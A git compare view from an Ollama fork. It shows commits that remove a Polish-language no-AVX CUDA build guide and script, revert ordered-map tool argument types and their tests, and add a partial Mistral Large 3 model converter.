Compare commits

..

4 Commits

Author SHA1 Message Date
Grace Guo 5584bf1e19 cleanup + add tokenizer hash 2025-12-17 15:34:31 -08:00
Grace Guo e2f8845f1c print statements to debug 2025-12-17 15:34:31 -08:00
Grace Guo 08d1485846 Mistral conversion 2025-12-17 15:34:31 -08:00
Grace Guo f331801252 init changes 2025-12-17 15:34:31 -08:00
90 changed files with 950 additions and 6078 deletions

View File

@ -1,38 +0,0 @@
# Instrukcja budowania dla Intel Xeon (bez AVX) + NVIDIA GPU (MX Linux)
Ten build naprawia błąd `Illegal instruction` na starszych procesorach i wymusza użycie CUDA.
## Wymagania
* Zainstalowane `cuda-toolkit` (bez sterowników, jeśli już są w systemie).
* Pobrane repozytorium z `git submodule update --init --recursive`.
## 1. Symlinki (Naprawa ścieżek MX Linux)
MX Linux trzyma CUDA w niestandardowym miejscu. Wykonaj raz:
```bash
sudo mkdir -p /usr/local/cuda
sudo ln -sFn /usr/lib/cuda/include /usr/local/cuda/include
sudo ln -sFn /usr/lib/x86_64-linux-gnu/nvidia/current /usr/local/cuda/lib64
```
```bash
# Wyczyść stare
rm -rf build
# Konfiguracja
cmake -B build \
-DOLLAMA_CUDA=ON \
-DOLLAMA_VULKAN=OFF \
-DGGML_VULKAN=OFF \
-DCMAKE_DISABLE_FIND_PACKAGE_Vulkan=TRUE
# Kompilacja (1 wątek dla stabilności przy OC)
cmake --build build -j1
# Zbudowanie pliku wykonywalnego
go build .
```
```bash
sudo mv ollama /usr/bin/ollama
sudo chmod +x /usr/bin/ollama
```

View File

@ -6,9 +6,6 @@
# Ollama # Ollama
W przypadku xeon 5675 przeczytaj plik NO_AVX_GUIDE.md!!
Możesz zastosować też build_custom.sh dla automatycznego FIX
Get up and running with large language models. Get up and running with large language models.
### macOS ### macOS

View File

@ -3,7 +3,6 @@ package api
import ( import (
"encoding/json" "encoding/json"
"fmt" "fmt"
"iter"
"log/slog" "log/slog"
"math" "math"
"os" "os"
@ -15,7 +14,6 @@ import (
"github.com/google/uuid" "github.com/google/uuid"
"github.com/ollama/ollama/envconfig" "github.com/ollama/ollama/envconfig"
"github.com/ollama/ollama/internal/orderedmap"
"github.com/ollama/ollama/types/model" "github.com/ollama/ollama/types/model"
) )
@ -229,79 +227,13 @@ type ToolCallFunction struct {
Arguments ToolCallFunctionArguments `json:"arguments"` Arguments ToolCallFunctionArguments `json:"arguments"`
} }
// ToolCallFunctionArguments holds tool call arguments in insertion order. type ToolCallFunctionArguments map[string]any
type ToolCallFunctionArguments struct {
om *orderedmap.Map[string, any]
}
// NewToolCallFunctionArguments creates a new empty ToolCallFunctionArguments.
func NewToolCallFunctionArguments() ToolCallFunctionArguments {
return ToolCallFunctionArguments{om: orderedmap.New[string, any]()}
}
// Get retrieves a value by key.
func (t *ToolCallFunctionArguments) Get(key string) (any, bool) {
if t == nil || t.om == nil {
return nil, false
}
return t.om.Get(key)
}
// Set sets a key-value pair, preserving insertion order.
func (t *ToolCallFunctionArguments) Set(key string, value any) {
if t == nil {
return
}
if t.om == nil {
t.om = orderedmap.New[string, any]()
}
t.om.Set(key, value)
}
// Len returns the number of arguments.
func (t *ToolCallFunctionArguments) Len() int {
if t == nil || t.om == nil {
return 0
}
return t.om.Len()
}
// All returns an iterator over all key-value pairs in insertion order.
func (t *ToolCallFunctionArguments) All() iter.Seq2[string, any] {
if t == nil || t.om == nil {
return func(yield func(string, any) bool) {}
}
return t.om.All()
}
// ToMap returns a regular map (order not preserved).
func (t *ToolCallFunctionArguments) ToMap() map[string]any {
if t == nil || t.om == nil {
return nil
}
return t.om.ToMap()
}
func (t *ToolCallFunctionArguments) String() string { func (t *ToolCallFunctionArguments) String() string {
if t == nil || t.om == nil { bts, _ := json.Marshal(t)
return "{}"
}
bts, _ := json.Marshal(t.om)
return string(bts) return string(bts)
} }
func (t *ToolCallFunctionArguments) UnmarshalJSON(data []byte) error {
t.om = orderedmap.New[string, any]()
return json.Unmarshal(data, t.om)
}
func (t ToolCallFunctionArguments) MarshalJSON() ([]byte, error) {
if t.om == nil {
return []byte("{}"), nil
}
return json.Marshal(t.om)
}
type Tool struct { type Tool struct {
Type string `json:"type"` Type string `json:"type"`
Items any `json:"items,omitempty"` Items any `json:"items,omitempty"`
@ -350,78 +282,13 @@ func (pt PropertyType) String() string {
return fmt.Sprintf("%v", []string(pt)) return fmt.Sprintf("%v", []string(pt))
} }
// ToolPropertiesMap holds tool properties in insertion order.
type ToolPropertiesMap struct {
om *orderedmap.Map[string, ToolProperty]
}
// NewToolPropertiesMap creates a new empty ToolPropertiesMap.
func NewToolPropertiesMap() *ToolPropertiesMap {
return &ToolPropertiesMap{om: orderedmap.New[string, ToolProperty]()}
}
// Get retrieves a property by name.
func (t *ToolPropertiesMap) Get(key string) (ToolProperty, bool) {
if t == nil || t.om == nil {
return ToolProperty{}, false
}
return t.om.Get(key)
}
// Set sets a property, preserving insertion order.
func (t *ToolPropertiesMap) Set(key string, value ToolProperty) {
if t == nil {
return
}
if t.om == nil {
t.om = orderedmap.New[string, ToolProperty]()
}
t.om.Set(key, value)
}
// Len returns the number of properties.
func (t *ToolPropertiesMap) Len() int {
if t == nil || t.om == nil {
return 0
}
return t.om.Len()
}
// All returns an iterator over all properties in insertion order.
func (t *ToolPropertiesMap) All() iter.Seq2[string, ToolProperty] {
if t == nil || t.om == nil {
return func(yield func(string, ToolProperty) bool) {}
}
return t.om.All()
}
// ToMap returns a regular map (order not preserved).
func (t *ToolPropertiesMap) ToMap() map[string]ToolProperty {
if t == nil || t.om == nil {
return nil
}
return t.om.ToMap()
}
func (t ToolPropertiesMap) MarshalJSON() ([]byte, error) {
if t.om == nil {
return []byte("null"), nil
}
return json.Marshal(t.om)
}
func (t *ToolPropertiesMap) UnmarshalJSON(data []byte) error {
t.om = orderedmap.New[string, ToolProperty]()
return json.Unmarshal(data, t.om)
}
type ToolProperty struct { type ToolProperty struct {
AnyOf []ToolProperty `json:"anyOf,omitempty"` AnyOf []ToolProperty `json:"anyOf,omitempty"`
Type PropertyType `json:"type,omitempty"` Type PropertyType `json:"type,omitempty"`
Items any `json:"items,omitempty"` Items any `json:"items,omitempty"`
Description string `json:"description,omitempty"` Description string `json:"description,omitempty"`
Enum []any `json:"enum,omitempty"` Enum []any `json:"enum,omitempty"`
Properties *ToolPropertiesMap `json:"properties,omitempty"` Properties map[string]ToolProperty `json:"properties,omitempty"`
} }
// ToTypeScriptType converts a ToolProperty to a TypeScript type string // ToTypeScriptType converts a ToolProperty to a TypeScript type string
@ -470,11 +337,11 @@ func mapToTypeScriptType(jsonType string) string {
} }
type ToolFunctionParameters struct { type ToolFunctionParameters struct {
Type string `json:"type"` Type string `json:"type"`
Defs any `json:"$defs,omitempty"` Defs any `json:"$defs,omitempty"`
Items any `json:"items,omitempty"` Items any `json:"items,omitempty"`
Required []string `json:"required,omitempty"` Required []string `json:"required,omitempty"`
Properties *ToolPropertiesMap `json:"properties"` Properties map[string]ToolProperty `json:"properties"`
} }
func (t *ToolFunctionParameters) String() string { func (t *ToolFunctionParameters) String() string {
@ -687,9 +554,6 @@ type CreateRequest struct {
Renderer string `json:"renderer,omitempty"` Renderer string `json:"renderer,omitempty"`
Parser string `json:"parser,omitempty"` Parser string `json:"parser,omitempty"`
// Requires is the minimum version of Ollama required by the model.
Requires string `json:"requires,omitempty"`
// Info is a map of additional information for the model // Info is a map of additional information for the model
Info map[string]any `json:"info,omitempty"` Info map[string]any `json:"info,omitempty"`
@ -740,7 +604,6 @@ type ShowResponse struct {
Tensors []Tensor `json:"tensors,omitempty"` Tensors []Tensor `json:"tensors,omitempty"`
Capabilities []model.Capability `json:"capabilities,omitempty"` Capabilities []model.Capability `json:"capabilities,omitempty"`
ModifiedAt time.Time `json:"modified_at,omitempty"` ModifiedAt time.Time `json:"modified_at,omitempty"`
Requires string `json:"requires,omitempty"`
} }
// CopyRequest is the request passed to [Client.Copy]. // CopyRequest is the request passed to [Client.Copy].

View File

@ -11,24 +11,6 @@ import (
"github.com/stretchr/testify/require" "github.com/stretchr/testify/require"
) )
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests, order not preserved)
func testPropsMap(m map[string]ToolProperty) *ToolPropertiesMap {
props := NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
// testArgs creates ToolCallFunctionArguments from a map (convenience function for tests, order not preserved)
func testArgs(m map[string]any) ToolCallFunctionArguments {
args := NewToolCallFunctionArguments()
for k, v := range m {
args.Set(k, v)
}
return args
}
func TestKeepAliveParsingFromJSON(t *testing.T) { func TestKeepAliveParsingFromJSON(t *testing.T) {
tests := []struct { tests := []struct {
name string name string
@ -327,9 +309,9 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
input: ToolFunctionParameters{ input: ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"name"}, Required: []string{"name"},
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"name": {Type: PropertyType{"string"}}, "name": {Type: PropertyType{"string"}},
}), },
}, },
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string"}}}`, expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string"}}}`,
}, },
@ -337,9 +319,9 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
name: "no required", name: "no required",
input: ToolFunctionParameters{ input: ToolFunctionParameters{
Type: "object", Type: "object",
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"name": {Type: PropertyType{"string"}}, "name": {Type: PropertyType{"string"}},
}), },
}, },
expected: `{"type":"object","properties":{"name":{"type":"string"}}}`, expected: `{"type":"object","properties":{"name":{"type":"string"}}}`,
}, },
@ -357,7 +339,7 @@ func TestToolFunctionParameters_MarshalJSON(t *testing.T) {
func TestToolCallFunction_IndexAlwaysMarshals(t *testing.T) { func TestToolCallFunction_IndexAlwaysMarshals(t *testing.T) {
fn := ToolCallFunction{ fn := ToolCallFunction{
Name: "echo", Name: "echo",
Arguments: testArgs(map[string]any{"message": "hi"}), Arguments: ToolCallFunctionArguments{"message": "hi"},
} }
data, err := json.Marshal(fn) data, err := json.Marshal(fn)
@ -547,7 +529,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
expected: ToolProperty{ expected: ToolProperty{
Type: PropertyType{"object"}, Type: PropertyType{"object"},
Description: "Location details", Description: "Location details",
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"address": { "address": {
Type: PropertyType{"string"}, Type: PropertyType{"string"},
Description: "Street address", Description: "Street address",
@ -556,7 +538,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
Type: PropertyType{"string"}, Type: PropertyType{"string"},
Description: "City name", Description: "City name",
}, },
}), },
}, },
}, },
{ {
@ -584,22 +566,22 @@ func TestToolPropertyNestedProperties(t *testing.T) {
expected: ToolProperty{ expected: ToolProperty{
Type: PropertyType{"object"}, Type: PropertyType{"object"},
Description: "Event", Description: "Event",
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"location": { "location": {
Type: PropertyType{"object"}, Type: PropertyType{"object"},
Description: "Location", Description: "Location",
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"coordinates": { "coordinates": {
Type: PropertyType{"object"}, Type: PropertyType{"object"},
Description: "GPS coordinates", Description: "GPS coordinates",
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"lat": {Type: PropertyType{"number"}, Description: "Latitude"}, "lat": {Type: PropertyType{"number"}, Description: "Latitude"},
"lng": {Type: PropertyType{"number"}, Description: "Longitude"}, "lng": {Type: PropertyType{"number"}, Description: "Longitude"},
}), },
}, },
}), },
}, },
}), },
}, },
}, },
} }
@ -609,13 +591,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
var prop ToolProperty var prop ToolProperty
err := json.Unmarshal([]byte(tt.input), &prop) err := json.Unmarshal([]byte(tt.input), &prop)
require.NoError(t, err) require.NoError(t, err)
assert.Equal(t, tt.expected, prop)
// Compare JSON representations since pointer comparison doesn't work
expectedJSON, err := json.Marshal(tt.expected)
require.NoError(t, err)
actualJSON, err := json.Marshal(prop)
require.NoError(t, err)
assert.JSONEq(t, string(expectedJSON), string(actualJSON))
// Round-trip test: marshal and unmarshal again // Round-trip test: marshal and unmarshal again
data, err := json.Marshal(prop) data, err := json.Marshal(prop)
@ -624,10 +600,7 @@ func TestToolPropertyNestedProperties(t *testing.T) {
var prop2 ToolProperty var prop2 ToolProperty
err = json.Unmarshal(data, &prop2) err = json.Unmarshal(data, &prop2)
require.NoError(t, err) require.NoError(t, err)
assert.Equal(t, tt.expected, prop2)
prop2JSON, err := json.Marshal(prop2)
require.NoError(t, err)
assert.JSONEq(t, string(expectedJSON), string(prop2JSON))
}) })
} }
} }
@ -643,12 +616,12 @@ func TestToolFunctionParameters_String(t *testing.T) {
params: ToolFunctionParameters{ params: ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"name"}, Required: []string{"name"},
Properties: testPropsMap(map[string]ToolProperty{ Properties: map[string]ToolProperty{
"name": { "name": {
Type: PropertyType{"string"}, Type: PropertyType{"string"},
Description: "The name of the person", Description: "The name of the person",
}, },
}), },
}, },
expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string","description":"The name of the person"}}}`, expected: `{"type":"object","required":["name"],"properties":{"name":{"type":"string","description":"The name of the person"}}}`,
}, },
@ -665,7 +638,7 @@ func TestToolFunctionParameters_String(t *testing.T) {
s.Self = s s.Self = s
return s return s
}(), }(),
Properties: testPropsMap(map[string]ToolProperty{}), Properties: map[string]ToolProperty{},
}, },
expected: "", expected: "",
}, },
@ -678,235 +651,3 @@ func TestToolFunctionParameters_String(t *testing.T) {
}) })
} }
} }
func TestToolCallFunctionArguments_OrderPreservation(t *testing.T) {
t.Run("marshal preserves insertion order", func(t *testing.T) {
args := NewToolCallFunctionArguments()
args.Set("zebra", "z")
args.Set("apple", "a")
args.Set("mango", "m")
data, err := json.Marshal(args)
require.NoError(t, err)
// Should preserve insertion order, not alphabetical
assert.Equal(t, `{"zebra":"z","apple":"a","mango":"m"}`, string(data))
})
t.Run("unmarshal preserves JSON order", func(t *testing.T) {
jsonData := `{"zebra":"z","apple":"a","mango":"m"}`
var args ToolCallFunctionArguments
err := json.Unmarshal([]byte(jsonData), &args)
require.NoError(t, err)
// Verify iteration order matches JSON order
var keys []string
for k := range args.All() {
keys = append(keys, k)
}
assert.Equal(t, []string{"zebra", "apple", "mango"}, keys)
})
t.Run("round trip preserves order", func(t *testing.T) {
original := `{"z":1,"a":2,"m":3,"b":4}`
var args ToolCallFunctionArguments
err := json.Unmarshal([]byte(original), &args)
require.NoError(t, err)
data, err := json.Marshal(args)
require.NoError(t, err)
assert.Equal(t, original, string(data))
})
t.Run("String method returns ordered JSON", func(t *testing.T) {
args := NewToolCallFunctionArguments()
args.Set("c", 3)
args.Set("a", 1)
args.Set("b", 2)
assert.Equal(t, `{"c":3,"a":1,"b":2}`, args.String())
})
t.Run("Get retrieves correct values", func(t *testing.T) {
args := NewToolCallFunctionArguments()
args.Set("key1", "value1")
args.Set("key2", 42)
v, ok := args.Get("key1")
assert.True(t, ok)
assert.Equal(t, "value1", v)
v, ok = args.Get("key2")
assert.True(t, ok)
assert.Equal(t, 42, v)
_, ok = args.Get("nonexistent")
assert.False(t, ok)
})
t.Run("Len returns correct count", func(t *testing.T) {
args := NewToolCallFunctionArguments()
assert.Equal(t, 0, args.Len())
args.Set("a", 1)
assert.Equal(t, 1, args.Len())
args.Set("b", 2)
assert.Equal(t, 2, args.Len())
})
t.Run("empty args marshal to empty object", func(t *testing.T) {
args := NewToolCallFunctionArguments()
data, err := json.Marshal(args)
require.NoError(t, err)
assert.Equal(t, `{}`, string(data))
})
t.Run("zero value args marshal to empty object", func(t *testing.T) {
var args ToolCallFunctionArguments
assert.Equal(t, "{}", args.String())
})
}
func TestToolPropertiesMap_OrderPreservation(t *testing.T) {
t.Run("marshal preserves insertion order", func(t *testing.T) {
props := NewToolPropertiesMap()
props.Set("zebra", ToolProperty{Type: PropertyType{"string"}})
props.Set("apple", ToolProperty{Type: PropertyType{"number"}})
props.Set("mango", ToolProperty{Type: PropertyType{"boolean"}})
data, err := json.Marshal(props)
require.NoError(t, err)
// Should preserve insertion order, not alphabetical
expected := `{"zebra":{"type":"string"},"apple":{"type":"number"},"mango":{"type":"boolean"}}`
assert.Equal(t, expected, string(data))
})
t.Run("unmarshal preserves JSON order", func(t *testing.T) {
jsonData := `{"zebra":{"type":"string"},"apple":{"type":"number"},"mango":{"type":"boolean"}}`
var props ToolPropertiesMap
err := json.Unmarshal([]byte(jsonData), &props)
require.NoError(t, err)
// Verify iteration order matches JSON order
var keys []string
for k := range props.All() {
keys = append(keys, k)
}
assert.Equal(t, []string{"zebra", "apple", "mango"}, keys)
})
t.Run("round trip preserves order", func(t *testing.T) {
original := `{"z":{"type":"string"},"a":{"type":"number"},"m":{"type":"boolean"}}`
var props ToolPropertiesMap
err := json.Unmarshal([]byte(original), &props)
require.NoError(t, err)
data, err := json.Marshal(props)
require.NoError(t, err)
assert.Equal(t, original, string(data))
})
t.Run("Get retrieves correct values", func(t *testing.T) {
props := NewToolPropertiesMap()
props.Set("name", ToolProperty{Type: PropertyType{"string"}, Description: "The name"})
props.Set("age", ToolProperty{Type: PropertyType{"integer"}, Description: "The age"})
v, ok := props.Get("name")
assert.True(t, ok)
assert.Equal(t, "The name", v.Description)
v, ok = props.Get("age")
assert.True(t, ok)
assert.Equal(t, "The age", v.Description)
_, ok = props.Get("nonexistent")
assert.False(t, ok)
})
t.Run("Len returns correct count", func(t *testing.T) {
props := NewToolPropertiesMap()
assert.Equal(t, 0, props.Len())
props.Set("a", ToolProperty{})
assert.Equal(t, 1, props.Len())
props.Set("b", ToolProperty{})
assert.Equal(t, 2, props.Len())
})
t.Run("nil props marshal to null", func(t *testing.T) {
var props *ToolPropertiesMap
data, err := json.Marshal(props)
require.NoError(t, err)
assert.Equal(t, `null`, string(data))
})
t.Run("ToMap returns regular map", func(t *testing.T) {
props := NewToolPropertiesMap()
props.Set("a", ToolProperty{Type: PropertyType{"string"}})
props.Set("b", ToolProperty{Type: PropertyType{"number"}})
m := props.ToMap()
assert.Equal(t, 2, len(m))
assert.Equal(t, PropertyType{"string"}, m["a"].Type)
assert.Equal(t, PropertyType{"number"}, m["b"].Type)
})
}
func TestToolCallFunctionArguments_ComplexValues(t *testing.T) {
t.Run("nested objects preserve order", func(t *testing.T) {
jsonData := `{"outer":{"z":1,"a":2},"simple":"value"}`
var args ToolCallFunctionArguments
err := json.Unmarshal([]byte(jsonData), &args)
require.NoError(t, err)
// Outer keys should be in order
var keys []string
for k := range args.All() {
keys = append(keys, k)
}
assert.Equal(t, []string{"outer", "simple"}, keys)
})
t.Run("arrays as values", func(t *testing.T) {
args := NewToolCallFunctionArguments()
args.Set("items", []string{"a", "b", "c"})
args.Set("numbers", []int{1, 2, 3})
data, err := json.Marshal(args)
require.NoError(t, err)
assert.Equal(t, `{"items":["a","b","c"],"numbers":[1,2,3]}`, string(data))
})
}
func TestToolPropertiesMap_NestedProperties(t *testing.T) {
t.Run("nested properties preserve order", func(t *testing.T) {
props := NewToolPropertiesMap()
nestedProps := NewToolPropertiesMap()
nestedProps.Set("z_field", ToolProperty{Type: PropertyType{"string"}})
nestedProps.Set("a_field", ToolProperty{Type: PropertyType{"number"}})
props.Set("outer", ToolProperty{
Type: PropertyType{"object"},
Properties: nestedProps,
})
data, err := json.Marshal(props)
require.NoError(t, err)
// Both outer and inner should preserve order
expected := `{"outer":{"type":"object","properties":{"z_field":{"type":"string"},"a_field":{"type":"number"}}}}`
assert.Equal(t, expected, string(data))
})
}

View File

@ -147,7 +147,6 @@ export const highlighterPromise = createHighlighter({
"c", "c",
"cpp", "cpp",
"sql", "sql",
"swift",
"yaml", "yaml",
"markdown", "markdown",
], ],

View File

@ -997,7 +997,7 @@ func (s *Server) chat(w http.ResponseWriter, r *http.Request) error {
for _, toolCall := range res.Message.ToolCalls { for _, toolCall := range res.Message.ToolCalls {
// continues loop as tools were executed // continues loop as tools were executed
toolsExecuted = true toolsExecuted = true
result, content, err := registry.Execute(ctx, toolCall.Function.Name, toolCall.Function.Arguments.ToMap()) result, content, err := registry.Execute(ctx, toolCall.Function.Name, toolCall.Function.Arguments)
if err != nil { if err != nil {
errContent := fmt.Sprintf("Error: %v", err) errContent := fmt.Sprintf("Error: %v", err)
toolErrMsg := store.NewMessage("tool", errContent, nil) toolErrMsg := store.NewMessage("tool", errContent, nil)
@ -1558,13 +1558,13 @@ func convertToOllamaTool(toolSchema map[string]any) api.Tool {
tool.Function.Parameters.Type = "object" tool.Function.Parameters.Type = "object"
tool.Function.Parameters.Required = []string{} tool.Function.Parameters.Required = []string{}
tool.Function.Parameters.Properties = api.NewToolPropertiesMap() tool.Function.Parameters.Properties = make(map[string]api.ToolProperty)
if schemaProps, ok := toolSchema["schema"].(map[string]any); ok { if schemaProps, ok := toolSchema["schema"].(map[string]any); ok {
tool.Function.Parameters.Type = getStringFromMap(schemaProps, "type", "object") tool.Function.Parameters.Type = getStringFromMap(schemaProps, "type", "object")
if props, ok := schemaProps["properties"].(map[string]any); ok { if props, ok := schemaProps["properties"].(map[string]any); ok {
tool.Function.Parameters.Properties = api.NewToolPropertiesMap() tool.Function.Parameters.Properties = make(map[string]api.ToolProperty)
for propName, propDef := range props { for propName, propDef := range props {
if propMap, ok := propDef.(map[string]any); ok { if propMap, ok := propDef.(map[string]any); ok {
@ -1572,7 +1572,7 @@ func convertToOllamaTool(toolSchema map[string]any) api.Tool {
Type: api.PropertyType{getStringFromMap(propMap, "type", "string")}, Type: api.PropertyType{getStringFromMap(propMap, "type", "string")},
Description: getStringFromMap(propMap, "description", ""), Description: getStringFromMap(propMap, "description", ""),
} }
tool.Function.Parameters.Properties.Set(propName, prop) tool.Function.Parameters.Properties[propName] = prop
} }
} }
} }

View File

@ -1,44 +0,0 @@
---
### 2. `build_custom.sh` (Skrypt automatyzujący)
To jest opcja "Pro". Zamiast wklepywać te komendy ręcznie, tworzysz skrypt bashowy. Jak będziesz chciał zaktualizować Ollamę za pół roku, po prostu odpalisz `./build_custom.sh` i pójdziesz na kawę.
**Zawartość pliku:**
```bash
#!/bin/bash
# Skrypt budowania Ollama dla Xeon X5675 (No AVX) + GTX 1070
# Uruchom to w głównym katalogu repozytorium
echo "--- [1/4] Czyszczenie poprzedniego builda ---"
rm -rf build
go clean -cache
echo "--- [2/4] Konfiguracja CMake (CUDA ON, Vulkan OFF) ---"
# Flagi kluczowe dla Twojego systemu
cmake -B build \
-DOLLAMA_CUDA=ON \
-DOLLAMA_VULKAN=OFF \
-DGGML_VULKAN=OFF \
-DCMAKE_DISABLE_FIND_PACKAGE_Vulkan=TRUE
if [ $? -ne 0 ]; then
echo "Błąd konfiguracji CMake!"
exit 1
fi
echo "--- [3/4] Kompilacja silnika (Tryb bezpieczny -j1) ---"
# Używamy -j1 bo przy OC Twój Xeon może być niestabilny przy kompilacji
cmake --build build -j1
if [ $? -ne 0 ]; then
echo "Błąd kompilacji!"
exit 1
fi
echo "--- [4/4] Budowanie pliku binarnego Go ---"
go build .
echo "--- GOTOWE! ---"
echo "Twój plik 'ollama' jest gotowy."
echo "Aby zainstalować wpisz: sudo mv ollama /usr/bin/ollama"

View File

@ -45,7 +45,6 @@ import (
"github.com/ollama/ollama/types/model" "github.com/ollama/ollama/types/model"
"github.com/ollama/ollama/types/syncmap" "github.com/ollama/ollama/types/syncmap"
"github.com/ollama/ollama/version" "github.com/ollama/ollama/version"
xcmd "github.com/ollama/ollama/x/cmd"
) )
const ConnectInstructions = "To sign in, navigate to:\n %s\n\n" const ConnectInstructions = "To sign in, navigate to:\n %s\n\n"
@ -518,9 +517,6 @@ func RunHandler(cmd *cobra.Command, args []string) error {
return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions) return generateEmbedding(cmd, name, opts.Prompt, opts.KeepAlive, truncate, dimensions)
} }
// Check for experimental flag
isExperimental, _ := cmd.Flags().GetBool("experimental")
if interactive { if interactive {
if err := loadOrUnloadModel(cmd, &opts); err != nil { if err := loadOrUnloadModel(cmd, &opts); err != nil {
var sErr api.AuthorizationError var sErr api.AuthorizationError
@ -547,11 +543,6 @@ func RunHandler(cmd *cobra.Command, args []string) error {
} }
} }
// Use experimental agent loop with
if isExperimental {
return xcmd.GenerateInteractive(cmd, opts.Model, opts.WordWrap, opts.Options, opts.Think, opts.HideThinking, opts.KeepAlive)
}
return generateInteractive(cmd, opts) return generateInteractive(cmd, opts)
} }
return generate(cmd, opts) return generate(cmd, opts)
@ -952,9 +943,6 @@ func showInfo(resp *api.ShowResponse, verbose bool, w io.Writer) error {
rows = append(rows, []string{"", "parameters", resp.Details.ParameterSize}) rows = append(rows, []string{"", "parameters", resp.Details.ParameterSize})
} }
rows = append(rows, []string{"", "quantization", resp.Details.QuantizationLevel}) rows = append(rows, []string{"", "quantization", resp.Details.QuantizationLevel})
if resp.Requires != "" {
rows = append(rows, []string{"", "requires", resp.Requires})
}
return return
}) })
@ -1763,7 +1751,6 @@ func NewCLI() *cobra.Command {
runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)") runCmd.Flags().Bool("hidethinking", false, "Hide thinking output (if provided)")
runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead") runCmd.Flags().Bool("truncate", false, "For embedding models: truncate inputs exceeding context length (default: true). Set --truncate=false to error instead")
runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)") runCmd.Flags().Int("dimensions", 0, "Truncate output embeddings to specified dimension (embedding models only)")
runCmd.Flags().Bool("experimental", false, "Enable experimental agent loop with tools")
stopCmd := &cobra.Command{ stopCmd := &cobra.Command{
Use: "stop MODEL", Use: "stop MODEL",

View File

@ -291,31 +291,6 @@ Weigh anchor!
t.Errorf("unexpected output (-want +got):\n%s", diff) t.Errorf("unexpected output (-want +got):\n%s", diff)
} }
}) })
t.Run("min version", func(t *testing.T) {
var b bytes.Buffer
if err := showInfo(&api.ShowResponse{
Details: api.ModelDetails{
Family: "test",
ParameterSize: "7B",
QuantizationLevel: "FP16",
},
Requires: "0.14.0",
}, false, &b); err != nil {
t.Fatal(err)
}
expect := ` Model
architecture test
parameters 7B
quantization FP16
requires 0.14.0
`
if diff := cmp.Diff(expect, b.String()); diff != "" {
t.Errorf("unexpected output (-want +got):\n%s", diff)
}
})
} }
func TestDeleteHandler(t *testing.T) { func TestDeleteHandler(t *testing.T) {

View File

@ -40,7 +40,6 @@ func generateInteractive(cmd *cobra.Command, opts runOptions) error {
fmt.Fprintln(os.Stderr, " /bye Exit") fmt.Fprintln(os.Stderr, " /bye Exit")
fmt.Fprintln(os.Stderr, " /?, /help Help for a command") fmt.Fprintln(os.Stderr, " /?, /help Help for a command")
fmt.Fprintln(os.Stderr, " /? shortcuts Help for keyboard shortcuts") fmt.Fprintln(os.Stderr, " /? shortcuts Help for keyboard shortcuts")
fmt.Fprintln(os.Stderr, "") fmt.Fprintln(os.Stderr, "")
fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.") fmt.Fprintln(os.Stderr, "Use \"\"\" to begin a multi-line message.")

View File

@ -216,6 +216,8 @@ func ConvertModel(fsys fs.FS, f *os.File) error {
conv = &deepseekocr{} conv = &deepseekocr{}
case "DeepseekV3ForCausalLM": case "DeepseekV3ForCausalLM":
conv = &deepseek2Model{} conv = &deepseek2Model{}
case "MistralForCausalLM":
conv = &mistralLarge3Model{}
default: default:
return fmt.Errorf("unsupported architecture %q", p.Architectures[0]) return fmt.Errorf("unsupported architecture %q", p.Architectures[0])
} }

View File

@ -0,0 +1,286 @@
package convert
import (
"cmp"
"fmt"
"log/slog"
"regexp"
"strconv"
"strings"
"github.com/ollama/ollama/fs/ggml"
)
type mistralLarge3Model struct {
ModelParameters
Dim uint32 `json:"dim"`
NumLayers uint32 `json:"n_layers"`
HeadDim uint32 `json:"head_dim"`
HiddenDim uint32 `json:"hidden_dim"`
NumHeads uint32 `json:"n_heads"`
NumKVHeads uint32 `json:"n_kv_heads"`
RopeTheta float32 `json:"rope_theta"`
NormEps float32 `json:"norm_eps"`
VocabSize uint32 `json:"vocab_size"`
TiedEmbeddings bool `json:"tied_embeddings"`
MaxPosEmbed uint32 `json:"max_position_embeddings"`
MaxSeqLen uint32 `json:"max_seq_len"`
// LoRA attention parameters (DeepSeek-style)
QLoraRank uint32 `json:"q_lora_rank"`
QKRopeHeadDim uint32 `json:"qk_rope_head_dim"`
QKNopeHeadDim uint32 `json:"qk_nope_head_dim"`
KVLoraRank uint32 `json:"kv_lora_rank"`
VHeadDim uint32 `json:"v_head_dim"`
// ROPE scaling configurations
Llama4Scaling struct {
OrigMaxPosEmbed uint32 `json:"original_max_position_embeddings"`
Beta float32 `json:"beta"`
} `json:"llama_4_scaling"`
Yarn struct {
OrigMaxPosEmbed uint32 `json:"original_max_position_embeddings"`
Factor float32 `json:"factor"`
ApplyScale bool `json:"apply_scale"`
Beta float32 `json:"beta"`
Alpha float32 `json:"alpha"`
} `json:"yarn"`
// MOE configuration
MOE struct {
ExpertParallel uint32 `json:"expert_parallel"`
ExpertModelParallel uint32 `json:"expert_model_parallel"`
RouteEveryN uint32 `json:"route_every_n"`
FirstKDenseReplace uint32 `json:"first_k_dense_replace"`
NumExperts uint32 `json:"num_experts"`
NumExpertsPerTok uint32 `json:"num_experts_per_tok"`
NumExpertGroups uint32 `json:"num_expert_groups"`
NumExpertGroupsPerTok uint32 `json:"num_expert_groups_per_tok"`
